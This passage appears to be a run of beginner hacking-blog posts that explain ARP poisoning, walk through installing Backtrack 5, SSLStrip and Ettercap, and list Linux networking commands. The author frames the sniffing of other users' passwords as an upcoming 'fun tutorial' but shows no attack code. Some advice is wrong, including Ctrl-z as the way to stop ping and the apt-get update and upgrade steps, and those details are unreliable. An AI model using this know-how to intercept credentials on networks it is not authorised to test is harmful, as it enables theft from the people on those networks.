<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyW-ELAnnkPcEawMxlvch6VPudU9tOy8ekJtcjD-sjjy-cG5MEEWqlg2vz494DB6a61wfWpBPMmFalv-AOD2RqseWZiVeZTzmOqhFubg9J7V9bhwVxrnCMqZc2_pvXTPmJu549G3nV8M/s1600/ARP+MITM.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyW-ELAnnkPcEawMxlvch6VPudU9tOy8ekJtcjD-sjjy-cG5MEEWqlg2vz494DB6a61wfWpBPMmFalv-AOD2RqseWZiVeZTzmOqhFubg9J7V9bhwVxrnCMqZc2_pvXTPmJu549G3nV8M/s400/ARP+MITM.JPG" width="400" /></a></div>The malicious user, or hacker, listens in on the network and changes the ARP cache of the receiving "LAN user" to send messages to the malicious user FIRST, then back out to the corresponding target (in this case, the LAN Gateway.<br />
This way, the hacker can view all the network traffic between the User and Gateway and change certain inquires, whether it be to an HTTPS (secure connection) site or any site in general.<br />
We will be using this in the near future to sniff passwords from any site (HTTP and HTTPS) and show how dangerous an unwanted user on your network really is.<br />
<br />
You can view your computer's ARP cache by typing "arp -a" into the command line on Windows or Linux and view the IP addresses and corresponding MAC addresses of each node your computer has saved.<br />
<br />
Many users think that if they have a simple encryption on their network, it can't be broken. Some think that even if someone gains access into their network, it doesn't even matter! But this is <em>FAR</em> from the truth. <br />
You will see how much damage a single user can cause on an unprotected network, whether it be through DNS spoofing (changing sites what certain IP addresses go to), password sniffing (Facebook, Google, Paypal, and Myspace passwords in clear text!), or DoS (denial of service) attacks.<br />
<br />
This was a quick writeup and I'll be updating it frequently as I do with all my posts, but I wanted to get a quick post out to explain what ARP and ARP poisoning is, as it is vital in our path to learning network and computer security.</div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-72182216439962294852011-06-29T18:27:00.004-04:002022-12-20T10:46:27.081-05:00[OLD] So you want to use Backtrack 5? [With Pictures/Windows/Mac/Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div dir="ltr" style="text-align: left;" trbidi="on">
I'm seeing a lot of my viewers still use Windows, and since I haven't posted any Windows information yet (don't worry, I will!) I felt like posting a how-to on dual-booting (or single-booting) the penetration testing suite I use called Backtrack 5 would be very helpful to everyone viewing my blog.<br />
<br />
<div style="text-align: left;">
Here's a quick list of the things you'll need to install Backtrack 5:</div>
<ol style="text-align: left;">
<li style="text-align: left;">a USB stick with at least 2gigs of free space (mine is 8gigs), I would suggest 4gigs as a minimum.</li>
<li style="text-align: left;">a computer to install it to (you can dualboot, or fresh install and overwrite a disk)</li>
<li style="text-align: left;">an Ethernet Internet connection makes this easier in the updating stage.</li>
</ol>
<br />
<a name='more'></a>First we're going to have to format your USB stick-drive (or whatever you want to call it... pendrive or stick) to "FAT 32" (File Allocation Table) which is not the normal format most USB drives use. The default is usually NTFS (New Technology File System) and supports higher file sizes and is in general faster than FAT 32. You can read more on the differences <a href="http://www.ntfs.com/ntfs_vs_fat.htm">here</a>.<br />
<br />
Plug in your USB stick to a computer that can connect to the Internet (I'm assuming, since you're reading this, that you can download and transfer files) and go to "My Computer" on Windows, or your respective file system directory. I'm using Windows XP SP3, so the screenshots and most of my references will be based upon the look and feel of that. If you have a different OS then I'll try to help you troubleshoot it, but I don't have much experience in iOS or Vista at the moment.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipM_SnOhFGLt9zEE-c7-F464sOA85FV0-W6cTDk53RzmmT21a33STa4k-XtH05nAO5H_W-gzl98Sxd1XTKH811W5DG0zJQGaje7wkqfHcS0ZgHj9mvYpUhv1A5e3gilt5uzGTpoElMYeU/s400/1+-+my+computer.JPG" style="margin-left: auto; margin-right: auto;" width="400" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The USB pendrive should be visible here.<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipM_SnOhFGLt9zEE-c7-F464sOA85FV0-W6cTDk53RzmmT21a33STa4k-XtH05nAO5H_W-gzl98Sxd1XTKH811W5DG0zJQGaje7wkqfHcS0ZgHj9mvYpUhv1A5e3gilt5uzGTpoElMYeU/s1600/1+-+my+computer.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></td></tr>
</tbody></table>
<div align="left" class="separator" style="clear: both; text-align: center;">
<br /></div>
When you can see the drive, right click it and a "format" option should be available. Click on that option.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK9gfiom3XahUUp7MVwR3-Edv1mswsvTVBNzuPhljH-4oeuoLE9UevbzCp8fMHQfPWmjnIhWgy2cUopyV745Wx0bb1I_Ut_ezpxwbAyuyk7KNACmnFblH1W17FDRMi54nk9irnODJcH2g/s1600/2+-+format.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK9gfiom3XahUUp7MVwR3-Edv1mswsvTVBNzuPhljH-4oeuoLE9UevbzCp8fMHQfPWmjnIhWgy2cUopyV745Wx0bb1I_Ut_ezpxwbAyuyk7KNACmnFblH1W17FDRMi54nk9irnODJcH2g/s400/2+-+format.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click the "format" option.</td></tr>
</tbody></table>
Once you've clicked it, a GUI (graphical user interface) panel should pop up much like this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkjOQr8lHJ6-HljmAOnr0t3WjiapYwE8VcCplI4EdpKdJ5OGFDw96xZgfKOTM6d7uLb0ACR29N6PTQ5CkmcQdaxShcvb4FoKeLoP5fDgHkh8IxrqQAtKGOTPu05ryIwiqb-dYOKXdLtfQ/s1600/3+-+format+gui.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkjOQr8lHJ6-HljmAOnr0t3WjiapYwE8VcCplI4EdpKdJ5OGFDw96xZgfKOTM6d7uLb0ACR29N6PTQ5CkmcQdaxShcvb4FoKeLoP5fDgHkh8IxrqQAtKGOTPu05ryIwiqb-dYOKXdLtfQ/s320/3+-+format+gui.JPG" width="204" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">View on Windows XP SP3</td></tr>
</tbody></table>
<b>Make sure you don't have any sensitive information or files you want on your drive... this will completely erase it. Before you do this, save all your files on this drive!<br />
</b><br />
My options are already set like I want, but the "File System" should be "FAT32" and not "NTFS," if you format it as NTFS, it will be pointless. Leave the "allocation unit size" default and name your "volume label" whatever you want; I kept mine the same.<br />
Once you click "START" it will remind you all information will be deleted... so again <b><u>SAVE ANY FILES YOU DON'T WANT TO LOSE FOREVER.</u></b><br />
<br />
It shouldn't take long to format, and a "format complete" pop up will come up. Good job, step 1 is down!<br />
<br />
Now to get Backtrack 5 up on your drive...<br />
Go to the <a href="http://www.backtrack-linux.org/downloads/">Backtrack download page</a> and just click the "download" button in the middle of the screen; you don't need to enter an email if you don't want to.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-_fnuG8jd088/Tgq1Jf4-sPI/AAAAAAAAABY/LVBD-lMqzOM/s1600/4+-+backtrack+download+1.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="327" src="https://4.bp.blogspot.com/-_fnuG8jd088/Tgq1Jf4-sPI/AAAAAAAAABY/LVBD-lMqzOM/s400/4+-+backtrack+download+1.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">You don't have to register, but go ahead if it interests you.</td></tr>
</tbody></table>
<a href="http://3.bp.blogspot.com/-mSUETJgPJrs/Tgq1CXhBZtI/AAAAAAAAABU/sQxxatDqF0A/s1600/4+-+backtrack+download+1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a><br />
The window will change to a selection area of the different "flavors" of Backtrack 5. Below is a quick explanation of each:<br />
<ul style="text-align: left;">
<li>WM Flavor<br />
</li>
<ul style="text-align: left;">
<li>GNOME --- check out the <a href="http://www.gnome.org/">Gnome site</a> for an in-depth view of what it is, but below is a screenshot of the look. I personally use GNOME over KDE.</li>
</ul>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-I4MVUDj0Gj0/Tgq2PNGYTWI/AAAAAAAAABc/ULHkf2WinmE/s1600/5+-+backtrack+gnome+look.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://2.bp.blogspot.com/-I4MVUDj0Gj0/Tgq2PNGYTWI/AAAAAAAAABc/ULHkf2WinmE/s400/5+-+backtrack+gnome+look.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">GNOME Backtrack 5 GUI</td></tr>
</tbody></table>
<br />
<ul style="text-align: left;"><ul style="text-align: left;"></ul>
<ul style="text-align: left;">
<li> KDE --- check out the <a href="http://www.kde.org/">KDE site</a> for an in-depth view of what this flavor is like, but again, here's a screenshot of the KDE look on Backtrack 5</li>
</ul>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-aoc7iqtV2NY/Tgq3Z3lQavI/AAAAAAAAABg/JklXeJpT3ts/s1600/6+-+backtrack+kde+look.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://2.bp.blogspot.com/-aoc7iqtV2NY/Tgq3Z3lQavI/AAAAAAAAABg/JklXeJpT3ts/s400/6+-+backtrack+kde+look.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">KDE Backtrack 5 GUI</td><td class="tr-caption" style="text-align: center;"></td></tr>
</tbody></table>
<ul style="text-align: left;">
<li>The "Architecture" depends on your CPU (32-bit or 64-bit processor) -- a safe bet is 32-bit, but if you know your CPU is 64-bit you can use that.</li>
<li>The "image" is the type of file you want to download. Download the "ISO" for now since we're going to be using that one. VM is for using as a virtual machine (check out my <a href="http://www.hackavision.com/2013/04/starting-pentesting-lab-how.html" target="_blank">Penetration Testing Lab Setup</a> for more on that)</li>
<li>The "download" is how you'll be downloading it. If you know how to torrent, you can do that, but otherwise just choose "direct" and it will download it off the Backtrack 5 server.</li>
</ul>
Click the download button, and above the selection screen another interface will appear and tell you it's loading. After a few seconds, it will ask you again if you wish to register. Go ahead or don't, it doesn't matter. After you click through that selection, the download should pop up. Go ahead and save it to your desktop.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipFzKtwvOoGpVakKmYpo-cIJOKWg0lKXalP3qvMisc1uxwsg33kjAcX6Qur1Ot41qHskpAwOAhDpjNYgsPraTDd0W49IiAh7ZBq4cyuTnHF5zLDcB3jQ_Kk6JFzcfowdg9jSGr_wZ5r9Y/s1600/7+-+backtrack+download.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipFzKtwvOoGpVakKmYpo-cIJOKWg0lKXalP3qvMisc1uxwsg33kjAcX6Qur1Ot41qHskpAwOAhDpjNYgsPraTDd0W49IiAh7ZBq4cyuTnHF5zLDcB3jQ_Kk6JFzcfowdg9jSGr_wZ5r9Y/s400/7+-+backtrack+download.JPG" width="500" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sorry the picture is fuzzy, click on it for an enlarged version.</td><td class="tr-caption" style="text-align: center;"></td></tr>
</tbody></table>
Now we need to download the program to put this ISO on our formatted pendrive. It's called "UNetbootin" and can be downloaded for Windows <a href="http://unetbootin.sourceforge.net/unetbootin-windows-latest.exe">here</a>, Mac OS <a href="http://unetbootin.sourceforge.net/unetbootin-mac-latest.zip">here</a>, and if you're reinstalling from Linux, grab the Linux one <a href="http://unetbootin.sourceforge.net/unetbootin-linux-latest">here</a>.<br />
Once it's done downloading from Sourceforge, just run the program (it requires no installation) and you will be confronted with an options page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYP_UlDPHGaOeVEEFV4rvSRiSg1Cvo47-e0qxIZLZcTL_z2oafkd5KKGyF1kvjqSCrOsRBk_FF3xc6nzWYLnMbFYmwT3PZIG5xUugUP_jUC1wQMTfAWMWwaRU1zvjDhkMrHenpaqTQPg/s1600/8+-+unetbootin.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYP_UlDPHGaOeVEEFV4rvSRiSg1Cvo47-e0qxIZLZcTL_z2oafkd5KKGyF1kvjqSCrOsRBk_FF3xc6nzWYLnMbFYmwT3PZIG5xUugUP_jUC1wQMTfAWMWwaRU1zvjDhkMrHenpaqTQPg/s400/8+-+unetbootin.JPG" width="400" /></a></div>
Go ahead and ignore the top selections and click the hollow circle next to "Diskimage," then click the "..." button to the far right and navigate and select the ISO you just downloaded (it should be on your desktop like I instructed).<br />
Leave the "type" on USB Drive, or select that option if it is not already selected, and have the correct drive selected as well (you can view which drive it is in My Computer).<br />
Next, click "OK" and it should skip downloading files (we're using an ISO, so no downloading necessary), extract and copy, install the bootloader, then complete the installation (this may take some time... just be patient).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNE8UNaZoLulsCHBFE1w6fylAXgi5hHy13rD7QKPJNbs5vFgnLdxEACdYCm1eClFVkLBICW9tXkeDk4msHyUmBJ-XlMElK4DWa275sF3qGnDUxancQ1E8NUxN8V9syFSBGMoMvfCFkJA/s1600/9+-+unetbootin+install.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNE8UNaZoLulsCHBFE1w6fylAXgi5hHy13rD7QKPJNbs5vFgnLdxEACdYCm1eClFVkLBICW9tXkeDk4msHyUmBJ-XlMElK4DWa275sF3qGnDUxancQ1E8NUxN8V9syFSBGMoMvfCFkJA/s400/9+-+unetbootin+install.JPG" width="400" /></a></div>
After it installs it will give you the option to restart or cancel. If you want to install BT5 on your current computer right now, just click the restart to begin, or click cancel and plug in your USB stick to the computer you want to install it to and restart or turn on that computer.<br />
<br />
When your computer is starting up, mash the key to enter boot options (mine is F10, most are F12 as far as I know) and a boot option loadup should appear. Select the top most Backtrack option (should say something like text mode; also available are forensics mode, memtest mode, and others, but don't worry about those).<br />
<br />
The Backtrack 5 background should appear with no icons or anything; push the F8 key and it will continue.<br />
<br />
Your computer should then load up in a black screen with white text cascading down (this is Backtrack loading off your USB) and you should be confronted with a command prompt line. If it asks for a login, the default is "root" and password "toor" but for now it shouldn't.<br />
Type in "startx" to load the Backtrack GUI (graphical user interface) with one icon in the top left that says "Install Backtrack" with the Backtrack icon. Double click this.<br />
<br />
This is the installation of Backtrack 5 onto your computer so you can run it off the HDD (hard disk drive) and not the USB stick. Go through each setup configuration (time zone, language, and keyboard setup) until you reach a prompt like the one below (not my prompt; mine is Windows XP, but I couldn't get a screenshot of mine).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRrPvtqg7YAstAVmPBzdU1hg7Su-M3VFqb9jGR6TUUMcC2KszHbl_iSETW2M4KrDPzXEq_hv8bPm0tYBazu9ni0q_PD-upF3hC8aTRFHpzMKTLCjcj3GcLa1aNlZ8vxhGW9jOzQG16-s/s400/Bt5_hdd_install08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRrPvtqg7YAstAVmPBzdU1hg7Su-M3VFqb9jGR6TUUMcC2KszHbl_iSETW2M4KrDPzXEq_hv8bPm0tYBazu9ni0q_PD-upF3hC8aTRFHpzMKTLCjcj3GcLa1aNlZ8vxhGW9jOzQG16-s/s400/Bt5_hdd_install08.png" width="400" /></a> </div>
If you want to dual-boot, make sure the top selection "install them side by side" is selected, if you select a different one <b>it will ERASE YOUR HARD DRIVE AND START FROM SCRATCH.</b><br />
<br />
If you want to solo-boot Backtrack, select the second option "erase and use entire disk" and select the correct HDD.<br />
<br />
If you're dual-booting it should tell you it's creating a new partition (space for the new operating system) and might take a while to do so, just wait for this to finish.<br />
<br />
Once this is done a "ready to install" page will show. Click on the "advanced" tab in the bottom right and make sure "install boot loader" is checked.<br />
Mine is "/dev/sda/" whereas my XP is "/dev/sda1/" so make sure they aren't the same or your computer is going to be quite messed up.<br />
<br />
After that is done, click "install" and it will begin. The installation pauses on 99% for quite some time, so don't worry (most of the installation is on 99% which isn't really the point of an updating bar).<br />
After it's installed, click the "restart now" button that pops up, or if you don't want to for some reason click the "continue testing" button.<br />
<br />
If you're dual-booting, once you boot up your system it should ask which operating system you want to use, select Backtrack 5 and push F8 again when the background shows up (don't panic because you can't do anything, your computer hasn't frozen, this is how BT loads) and wait for the black loadup screen to come up with cascading text.<br />
<br />
The default login is again "root" as the username and "toor" (root backwards) as the password.<br />
Change your password by typing "passwd [new password]" and it will update your password to whatever you want. Do this now for extra security.<br />
Next, on the next screen type "startx" to load up the Backtrack GUI so we can actually use our penetration suites.<br />
<br />
Lets do our first terminal usage with Backtrack to upgrade and update the already installed suites (collection of programs).<br />
<br />
Open a terminal (the black box with a ">_" in it on the top or bottom bar depending on whether you downloaded Gnome or KDE) and type "apt-get upgrade"<br />
<br />
For me everything is upgraded and it should tell you that. Next, type "apt-get update" and it will update all your packages installed. Mine only updated 3,473 kbs, but some others may not be updated for some reason. Run these frequently to get the most updated versions of all your programs! I run it once every few days.<br />
<br />
That's it. You should have Backtrack 5 working on your computer or laptop and should be able to dual-boot if you want that. Post below any issues and I'll respond!<br />
<ul style="text-align: left;"><ul style="text-align: left;"></ul>
</ul>
</div>
</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-43626327114207942362011-06-28T20:44:00.001-04:002022-12-20T10:46:27.745-05:00[OLD] Installing SSLStrip [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
I've written most of a how-to and explanation of how to use two programs, SSLStrip and Ettercap, to sniff networks and grab passwords even if a secure connection is used (HTTPS rather than HTTP), but I have to cover a few topics before I release it.<br />
First, I need to explain how to install SSLStrip for those people not using Backtrack 5, then I must explain ARP (Address Resolution Protocol) poisoning and spoofing, since this is an important part of using SSLStrip and Ettercap to grab passwords.<br />
<br />
If you're using Backtrack 5, like I mentioned before SSLStrip should be installed already and located in the "/pentest/web/sslstrip" folder and can be run by typing "python sslstrip.py"<br />
For the users not using Backtrack 5, follow the directions below:<br />
<br />
<a name='more'></a><br />
<ul style="text-align: left;">
<li>First, we need to install the dependencies required for SSLStrip. These include Python and a "twisted-web" Python module. Install these by using the apt-get command we've previously learned; type "apt-get install python" (use sudo [super user do] if you're not root or su) and then "apt-get install python-twisted-web"<br />
Once these dependencies are installed correctly by our apt-get, we can move on.<br />
</li>
<li>Next, download the SSLStrip tar file. We've done this with Aircrack and Ettercap, so you might have a slight idea what the next steps are, and if you do, try doing it yourself first to see if you can!<br />
The file is located <a href="http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz">here</a>. Save to your desktop or home or any folder you can remember and navigate to.<br />
<i><b>Make sure you navigate to this folder before issuing the commands below!</b></i></li>
<li>Of course now we're going to extract the tar file with the command "tar -zxvf sslstrip-0.9.tar.gz" and then move into the newly created directory with "cd sslstrip-0.9"<br />
You should now be in that folder, check this by typing "pwd"<br />
</li>
<li>Next, type "python ./setup.py install" and it should install without any errors. Again, if you're not root or a superuser, use the "sudo" command before the above command.</li>
</ul>
Again, this install was quite easy, but hopefully you understand how to extract and install the tar and tar.gz files that are used in Linux every day!<br />
I'll be posting an informative post tomorrow or the next day (I've been busy starting a new job) about ARP and why it's important to understand, then I will post a really fun tutorial about how to steal passwords over wifis using SSLStrip and Ettercap!<br />
<br /></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-26716271157683299162011-06-27T14:05:00.045-04:002011-06-29T13:36:35.704-04:00Beginning networking in Ubuntu [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">Since I'm trying to cover all the basics first so new users can jump right in to later topics by just reading these and the other posts I've released and *hopefully* gain and understanding of the most basic Linux commands and functions.<br />
<br />
Each command listed below I will attempt to describe the basis for it's name, what it's acronym stands for (if necessary), the basic uses of it, a few more advanced uses of it, and any other information I (or any commentators!) see useful.<br />
<br />
<a name='more'></a><br />
<ul><li>ifconfig --- Stands for "interface configuration," and is used to configure your network interfaces. While I post how-tos, I will often type [interface] which means that you should enter whichever network interface, without brackets, you want to use the command with.</li>
<ul><li>Typing "ifconfig --help" brings up a help list of options you can use with your ifconfig command. I'll review and go over some useful ones here, but try checking out a bunch of them yourself since each person has their own uses and needs.</li>
<li>Pull up a terminal and type the "ifconfig" command and review what appears. For me, the interfaces "eth0," "lo," "wlan0," and "wlan0mon" come up. eth0 is my ethernet interface, wlan0 is my wireless interface, and wlan0mon is my wireless monitoring interface.<br />
Lets disable and enable some interfaces. My monitoring interface (meaning and interface that is being used to monitor networks, used when packet sniffing as seen in the aircrackng tutorial) isn't being used by me right now, so lets enable this one for you, then disable it to see how these commands work.<br />
Type "ifconfig wlan0mon up" --- it shouldn't echo back anything on the screen, but if you type "ifconfig" to review your interfaces, "wlan0mon" should be included in there! For me, it's in "promiscuous mode" which I will review later.<br />
Now lets disable it. Type "ifconfig wlan0mon down" and then type your "ifconfig" command again. It should be gone!</li>
</ul><li>iwconfig --- like our ifconfig, but dealing with wireless interfaces. This command has much different commands which I will cover below.</li>
<ul><li>Type in the "iwconfig" command and look at the results. They're like the ifconfig results. Type in "iwconfig --help" and look at all the additional options you can type.</li>
<li>First, the "ESSID" stands for the "Extended Service Set Identification (ID)" and is the alphanumeric name we give our computers to discern them from others on the network.</li>
<ul><li>You can set the ESSID to anything, just type "iwconfig [interface] [essid]"</li>
</ul><li>Next, the "mode" can be set to managed, ad-hoc, master, repeater, secondary, or monitor. The descriptions are taken from the "man iwconfig" file.</li>
<ul><li>Managed --- "node (computer) connects to a network composed of many Access Points, with roaming"</li>
<li>Ad-hoc --- "network composed of only one cell and without Access Points"</li>
<li>Master --- "the node (computer) forward packets between other wireless nodes"</li>
<li>Secondary --- "the node (computer) acts as a backup master/repeater"</li>
<li>Monitor --- "the node (computer) is not associated with any cell and is passively monitor(s) all packets on the frequency)</li>
<li>Auto --- Automatic; self explanatory.</li>
<li>Examples: "iwconfig wlan0 mode monitor" or "iwconfig mon0 mode managed"<br />
If you have followed the installing Aircrack-ng tutorial and used the WEP/WPA cracking tutorial, you should be familiar with the "airmon-ng [interface] start" and "airmon-ng [interface] stop" commands; these change the interface from its current state to "monitor" mode, and from monitor mode to "managed" mode. You can test using these commands while using the iwconfig commands and see which one you like better.</li>
</ul><li>Frequency --- this you shouldn't be too worried with, most interfaces work on the 2.46GHz frequency.</li>
<li>Channel --- In north America, the channel will be between 1-11 (in other countries and continents they go higher, but for now lets just worry about north America). As you work with networks and sniffing them, you will realize some networks tend to go on the same channels (1, 6, and 11, for example); to change your interface to a different channel, type "iwconfig [interface] channel [channel #], E.G. "iwconfig wlan0 channel 6" would switch my interface wlan0 to channel 6 to listen.<br />
<br />
You shouldn't have to use more than these commands at first, but if necessary, type "iwconfig --help" or "man iwconfig" to review the additional commands.</li>
</ul><li>ping [options] --- I first reviewed the ping command in my <a href="http://hackavision.blogspot.com/2011/06/quick-overview-of-linux-commands-linux.html">quick overview of Linux commands</a>, but I'll try to explain more in depth here why ping is one of the most important networking tools in Linux (and Windows!), and some descriptive uses of it.<br />
A quick explanation of how ping works is that a packet called an "ECHO_REQUEST" packet is sent to the target, and if it is received, an "ECHO_REPLY" packet is sent back to the host that is issuing the ping command. If a reply packet is not received back, that tells the computer that the request packet was never received. This is called "packet loss" which you have probably seen before.<br />
<br />
The basic form of using the ping command is: <br />
<blockquote>ping <ip-address or hostname></blockquote>Try using this on your "localhost" which is the ip address "127.0.0.1"<br />
Pull up a new terminal and type in "ping 127.0.0.1" and review the output. Push Ctrl-z when you want it to stop pinging (ctrl-z is the EOF [end of file] command which stops most Linux operations).<br />
Lets go over some of ping's options:</li>
<ul><li>-c [#] --- the "count" option. The ping command will stop after the system has pinged the amount of times the user has specified; E.G. "ping -c 3 localhost" will ping 3 times, then stop. This is very useful to ping a specific amount of times so it doesn't spam-ping and to check say just 5 pings.<br />
Try this by typing the above command "ping -c 3 localhost" and review the outcome.</li>
<ul><li><b>ON WINDOWS, THE COUNT COMMAND IS "-n" INSTEAD OF "-c"</b><br />
</li>
</ul><li>-f --- the "flood ping" option. Taken from the manual page, it is described as<blockquote>"For every ECHO_REQUEST sent, a period is printed, while for ever [sic] ECHO_REPLY received a backspace is printed. This provides a rapid display of how many packets are being dropped."</blockquote>This command adds a visual aid to pinging. The gist of what the manual page says, is that for every request sent, a period is printed, and for every reply received, one is deleted.<br />
So say you ping five times, and five are sent, and five are received, then no periods would appear on screen since there would be five periods and five backspaces, nullifying these periods. For every period that appears, a packet is dropped.<br />
If you pinged five times, five packets are sent, but only three are received, then two periods would appear, meaning two packets were dropped.<br />
In layman terms, each period that appears is a dropped packet.<br />
</li>
<li>-i [#] --- the "interval" option. With this option, the ping command waits the specified amount of seconds in between each ping; the default is one second in between pings if this option is not used or specified.<br />
In the manual, it states that "only super-users may set interval to values less than 0.2 seconds" meaning that you have to be root or use the command "sudo" (super user do) before the ping command if you wish to have a quicker interval than one every 0.2 seconds.</li>
<li>-n --- the "numeric ouput only" option. When this option is used, if you ping a hostname (such as "www.google.com" or "localhost") it only uses the IP address in the output, and does not post the hostname.<br />
Compare these commands: "ping -c 5 localhost" and "ping -c 5 -n localhost"<br />
You see how the "bytes received from *hostname* (*IP address*)" is changed to "bytes received from *IP address*? That's what this command does.</li>
<li>-q --- the "quiet mode" option. If you use this option, it does not output each "bytes received" line while running the command, but instead just outputs the summary lines at the beginning and end.<br />
Try running the command "ping -c 5 -q localhost" and view the output. You should see the "PING localhost (127.0.0.1) xxx bytes of data" and then the statistics of the ping.<br />
This command is useful if you don't care about each output and just want to see the overall summary.</li>
<li>-t [#] --- the TTL (time to live) set command. Use this command to set the "time to live" time, which is the amount of "hops." or transfers between routers, that the ping packet will take before stopping. After each "hop" (transfer) the TTL number is reduced by one (n-1), until it reaches 0 and is then discarded.<br />
The maximum number this can be is 255.</li>
</ul><li>arp [options] --- The "arp" command displays the Address Resolution Protocol table, which is a list of computers that you have exchanged information with. You can manipulate the ARP cache with this command (which we will be doing eventually).<br />
Try issuing this command on your Linux machine with the simple command "arp" and review the output. A list of nodes (computers and routers) on your network should appear.<br />
The "address" is of course the IP of the computer or router.<br />
The "HWtype" is the type of connection (ethernet or wireless).<br />
The "HWaddress" is the MAC (media access control) address, or the "physical" address (which you will hear it referred to often, because this code is set to it when it is manufactured).<br />
Below are some arp options you can use:</li>
<ul><li> -a --- This option is to use the alternative "BSD" style output format and doesn't use tabs to space things.<br />
Compare the commands "arp" and "arp -a" and review how they look different.</li>
<li>-d --- This option (it's actually considered a "mode") deletes an ARP table entry (the manual says "a ARP" which is funny to me; correct grammar isn't the programmers highest interest).<br />
This command requires root privileges to run (they also spelled privilege "priveledge").</li>
<li>I will add more of these later. There aren't many more, but I will update it so we can understand all the options of arp.</li>
</ul></ul>I just got back from my vacation and wrote this up, I'll add MANY more tomorrow and in the following weeks, so come back to this post frequently to check it out. As always, post below any changes I need to make... I'm sure I messed something up!<br />
<br />
[Last edited June 29th, 1:30PM]<br />
<ul><ul></ul></ul></div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-26088534015164110002011-06-26T16:53:00.002-04:002022-12-20T10:46:29.005-05:00[OLD] Installing Ettercap [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
Right now I'm working on a password-sniffing Ettercap guide, but I require my home Desktop to finish it (with screenshots and better scripts), and me being on vacation in Florida right now impedes me from doing that. I'll be home tomorrow night, and should be working hard on it so look for something relating to this then!<br />
<br />
For now, here's a guide on installing the program I'll be using: Ettercap. Backtrack5 should come automatically installed with it, but for those dual-booting and using general Linux flavors, here's a guide for you!<br />
<a name='more'></a><br />
<ul>
